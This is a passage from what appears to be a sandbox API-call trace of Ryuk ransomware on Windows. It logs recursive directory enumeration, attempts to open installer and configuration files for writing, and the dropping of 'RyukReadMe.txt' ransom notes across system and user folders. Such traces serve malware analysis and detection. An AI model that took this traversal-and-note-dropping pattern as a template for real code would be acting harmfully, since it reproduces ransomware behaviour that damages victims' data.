(lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.874] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.874] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.874] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0140.874] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.875] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.875] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.875] SetLastError (dwErrCode=0x0) [0140.875] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.875] GetLastError () returned 0x5 [0140.875] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.875] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.875] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.875] SetLastError (dwErrCode=0x0) [0140.875] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.875] GetLastError () returned 0x5 [0140.875] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.875] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.875] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.876] SetLastError (dwErrCode=0x0) [0140.876] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.876] GetLastError () returned 0x5 [0140.876] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.876] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.876] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.876] SetLastError (dwErrCode=0x0) [0140.876] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.876] GetLastError () returned 0x5 [0140.876] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.876] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.876] SetLastError (dwErrCode=0x0) [0140.876] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.876] GetLastError () returned 0xb7 [0140.876] CloseHandle (hObject=0x180) returned 1 [0140.876] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Start Menu\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.876] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.876] SetLastError (dwErrCode=0x0) [0140.876] CreateFileW (lpFileName="C:\\ProgramData\\Start Menu\\RyukReadMe.txt" (normalized: "c:\\programdata\\start menu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.877] GetLastError () returned 0x5 [0140.877] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.877] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.877] SetLastError (dwErrCode=0x0) [0140.877] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.877] GetLastError () returned 0xb7 [0140.877] CloseHandle (hObject=0x180) returned 1 [0140.877] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Sun\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.878] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.878] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.878] SetLastError (dwErrCode=0x0) [0140.878] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\RyukReadMe.txt" (normalized: "c:\\programdata\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.878] GetLastError () returned 0x0 [0140.878] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0140.879] CloseHandle (hObject=0x184) returned 1 [0140.879] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Sun\\Java\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.879] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.879] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.879] SetLastError (dwErrCode=0x0) [0140.879] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\programdata\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.879] GetLastError () returned 0x0 [0140.879] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.880] CloseHandle (hObject=0x188) returned 1 [0140.880] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Sun\\Java\\Java Update\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.880] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.880] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.881] SetFileAttributesW (lpFileName="C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml", dwFileAttributes=0x80) returned 0 [0140.881] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.881] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.881] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.881] SetLastError (dwErrCode=0x0) [0140.881] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\Java\\Java Update\\RyukReadMe.txt" (normalized: "c:\\programdata\\sun\\java\\java update\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.881] GetLastError () returned 0x0 [0140.881] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.882] CloseHandle (hObject=0x188) returned 1 [0140.882] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.882] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.882] SetLastError (dwErrCode=0x0) [0140.882] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\programdata\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.882] GetLastError () returned 0xb7 [0140.882] CloseHandle (hObject=0x184) returned 1 [0140.883] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.883] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.883] SetLastError (dwErrCode=0x0) [0140.883] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\RyukReadMe.txt" (normalized: "c:\\programdata\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.883] GetLastError () returned 0xb7 [0140.883] CloseHandle (hObject=0x180) returned 1 [0140.883] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.883] SetLastError (dwErrCode=0x0) [0140.883] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.883] GetLastError () returned 0xb7 [0140.883] CloseHandle (hObject=0x180) returned 1 [0140.883] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Templates\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.883] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.883] SetLastError (dwErrCode=0x0) [0140.883] CreateFileW (lpFileName="C:\\ProgramData\\Templates\\RyukReadMe.txt" (normalized: "c:\\programdata\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.896] GetLastError () returned 0x5 [0140.896] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.896] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0 [0140.896] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0140.896] SetLastError (dwErrCode=0x0) [0140.896] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0140.896] GetLastError () returned 0xb7 [0140.896] CloseHandle (hObject=0x17c) returned 1 [0140.896] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0140.896] SetLastError (dwErrCode=0x0) [0140.896] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.896] GetLastError () returned 0x5 [0140.896] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0140.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.896] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0140.897] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.897] SetLastError (dwErrCode=0x0) [0140.897] CreateFileW (lpFileName="C:\\Recovery\\RyukReadMe.txt" (normalized: "c:\\recovery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.897] GetLastError () returned 0x5 [0140.897] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0140.897] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.897] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0140.897] SetLastError (dwErrCode=0x0) [0140.897] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.898] GetLastError () returned 0x5 [0140.898] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0140.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.898] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0140.898] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.898] SetLastError (dwErrCode=0x0) [0140.898] CreateFileW (lpFileName="C:\\System Volume Information\\RyukReadMe.txt" (normalized: "c:\\system volume information\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.898] GetLastError () returned 0x5 [0140.898] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0140.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.898] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0140.898] SetLastError (dwErrCode=0x0) [0140.898] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.898] GetLastError () returned 0x5 [0140.898] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0140.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.898] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3a2d00 [0140.899] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.899] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.899] SetLastError (dwErrCode=0x0) [0140.899] CreateFileW (lpFileName="C:\\Users\\RyukReadMe.txt" (normalized: "c:\\users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.899] GetLastError () returned 0x5 [0140.899] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.899] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.899] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.899] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.899] SetLastError (dwErrCode=0x0) [0140.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.899] GetLastError () returned 0x0 [0140.899] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0140.900] CloseHandle (hObject=0x184) returned 1 [0140.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.901] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.901] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.901] SetLastError (dwErrCode=0x0) [0140.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.912] GetLastError () returned 0x0 [0140.912] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.912] CloseHandle (hObject=0x188) returned 1 [0140.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.913] SetLastError (dwErrCode=0x0) [0140.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0140.913] GetLastError () returned 0x0 [0140.913] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0140.914] CloseHandle (hObject=0x18c) returned 1 [0140.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.914] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.914] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.914] SetLastError (dwErrCode=0x0) [0140.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0140.916] GetLastError () returned 0x0 [0140.916] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0140.917] CloseHandle (hObject=0x190) returned 1 [0140.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.917] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.917] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.917] SetLastError (dwErrCode=0x0) [0140.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 